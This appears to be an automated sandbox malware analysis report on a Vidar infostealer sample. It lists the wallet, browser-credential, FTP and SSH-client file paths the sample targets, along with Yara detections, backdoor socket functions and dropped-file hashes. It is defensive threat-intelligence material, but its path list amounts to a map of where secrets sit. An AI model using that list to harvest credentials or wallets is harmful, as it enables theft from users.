Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.3.file.exe.40d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0C40 sqlite3_bind_zeroblob,	0_2_6C9D0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0D60 sqlite3_bind_parameter_name,	0_2_6C9D0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8F8EA0 sqlite3_clear_bindings,	0_2_6C8F8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C9D0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8F6410 bind,WSAGetLastError,	0_2_6C8F6410
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA389592A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDA389592A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38CAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDA38CAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0A1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC0A1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0D290A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC0D290A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0EB7E8 bind,	23_2_00007FFDAC0EB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0F41DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC0F41DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC1215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFDAC1215FA

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1482922
Product:	CloudBasic
Start time:	11:25:18
Start date:	26.07.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	bea49eab907af8ad2cbea9bfb807aae2
SHA1:	8efec66e57e052d6392c5cbb7667d1b49e88116e
SHA256:	9b645f570116d3e10faa316981e4fcde6fe55417feced3385cfbb815c7df8707
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\BFCAAEHJDB.exe	PE32+ executable (GUI) x86-64, for MS Windows	E9CEBB30948E986C3C16E0C9EF8EC9F2	2F8B30106FE66B69C4920771142189A7B6C0C49E	3C96C92C11B1277B3569D21BDE04EE9B33501AEE5CB4AEA08DAC7DD41FF1845F
C:\ProgramData\DAEGIDHDHIDG\AAKEGI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\DAEGIDHDHIDG\BAKJKF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	37B1FC046E4B29468721F797A2BB968D	50055EF1C50E4C1A7CCF7D00620E95128E4C448B	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
C:\ProgramData\DAEGIDHDHIDG\ECBGCG	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\DAEGIDHDHIDG\EGCFHD	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\DAEGIDHDHIDG\FHIEBK	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\DAEGIDHDHIDG\FHIEBK-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\DAEGIDHDHIDG\GIIDBG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\ProgramData\DAEGIDHDHIDG\IDGDAA	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\DAEGIDHDHIDG\IJKKKF	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\DAEGIDHDHIDG\JDHCBA	ASCII text, with very long lines (1717), with CRLF line terminators	0F58C61DE9618A1B53735181E43EE166	CC45931CF12AF92935A84C2A015786CC810AEC3A	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_31a03d39eaf3456617715dbd42ad2f694d8d936_e5530a89_b5071b11-faba-4c62-8f2e-6bdb744cb7c5\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	310BE91F5D691639A8956B4C2DD7DDAA	E3C0ACED2D324D93683B25851196CE949151D315	C67BB1F6F76A77AB11F85F4FF67CFC19AACADB83750E2AE32C8B32147F76B0B8
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_812666da5b2f51c4c16d2b07f719a7c78639de5_61e28721_73515c69-440e-47be-bb34-66b4d951211c\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	BB2AE61C06AE8DCEE27C3ECB528508F9	5ECCC48340057AB4E63F1AD9C8FCDB99276F1EA5	690333476BA1D2801F374CFE87C199FC12A8B594A68E4BF669C4E30AEB3971E4
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D28.tmp.dmp	Mini DuMP crash report, 15 streams, Fri Jul 26 09:27:18 2024, 0x1205a4 type	056622A1945DD4237C5F930337B8E8F7	CB35211C0204E05151F8CF230739F93EB4E7D30D	50A0D37E6FF55599C1470A50E4D9052130DCE1731CEA697DC804C20386464240
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2EDE.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	12B5CF57C37515F8783A77F5CD54FD77	2A101C95F60BD29895AEBA35D375D8EB77118771	1BE9B3079D2EB339B8873F878B511C0861692D908C5CC07FA8AA025669A7EE8A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F1E.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	1D40C1350D6E1EA8F024B6D1D7E127AA	4887D743CD47FD94ACA2F707B3448F108371C862	54FF86C3D6365A03D1F72DE6A450B94CF55F1028CA4F9DCA6402717D35E30E33
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F4B.tmp.csv	data	677033F62174354904A982B70DAE803F	E51CA71680ACB06670FBD02E1687BCFE64C44312	6CDE66E14D66B058933B783498F0C4BCF80ABDDD57D14E1BAA5214E44DE69C3D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FB9.tmp.txt	data	035D388C540ACB1DF02FD2962976A713	07BDF6697C4F7E56580BF5B2F447D63C0C167DBB	F0C24BD840744B1784D9C665E06788A7045F81650E96733FFD6870C4690AE4F3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER36C8.tmp.dmp	Mini DuMP crash report, 15 streams, Fri Jul 26 09:28:26 2024, 0x1205a4 type	DA0EA83BBCA0FADBD07ADEBBBA29EC03	A9D7D834163EC4AA3587964ED6AC69F1073E24A5	EE5FBCB76BF5EC260C1D72E66E6497F3C7A5F13F50AC50B864E26BC89D7C6074
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3801.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	A140732D3EFA60739F96F0A3756E5350	4A468568583F76EFC8CBAE5DF26418879D8A9965	9D179D31A07A34E650012B23A1A0B82CB077C393622E5F165693B09A23F92D00
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3822.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	B8D7AA17DA9F34895CD75463A5B14E1E	BC9A03D95F9F110A571F16D82C93196442596C8D	4E2D486724791119EC36075EE9532073BD293EA387CF916E5C421A6587321936
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3841.tmp.csv	data	10C051D0AE81ED9A323E848F8BE59AC0	C75473E7373FCC8ECA056E18F1C70DC88F97C052	0024EF69C646FD2AE8EC89293913739889BD9C67DA8A57CD78C0517EB4A1075C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3880.tmp.txt	data	AB695C0215671C402061FD916B8B7A7E	C715F2824858A55D5EC87B5741265C480A0BD41F	DBE1678969FC27D5E0850286610C3BC6DD1A6FD913542B1E72F219FC92E57A01
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	F0FB0D50625E13969EB8407BF0831EE1	A2A79D842CF30067B7CB4FDC25F850B9E51154B0	16BBE489E724A7CD593C92572F4ADDB04BA8C80179F005CBEFF766613AA4F091
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl	data	40AB00517F4227F2C3C334F1D16B65B4	F8D57AF017E2209B4FB24122647FD7F71B67C87C	4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	E6CAC6ACD18D0BBAD9C2384B1DBEDE84	63004A83FF18CCE911BC74D27C1A2B7BEA9CF4C3	9BC6EDD286F4DCD83E57B541BC99038F7E902DE943A6FD528BA485DF1187FFA8
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log	ASCII text, with CRLF line terminators	8576DA859E47A9638907C648E5432A51	B2A6A7BA46BA2A2755CD2E6D73409EFD785E0DD4	B450CB0C96F63C6227361EF6CB8B09D33298E0BCB94885D5A156642B4205D7C2
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini	Generic INItialization configuration [cnccli]	91D86E531FECE0D34AD78D947FC7331C	52C9A7C16634637E9DB31A6CE63850DFB170B44D	A885C71096995389DF3015B194B9AD10AE24C4328F4322932D6455398B2FC653
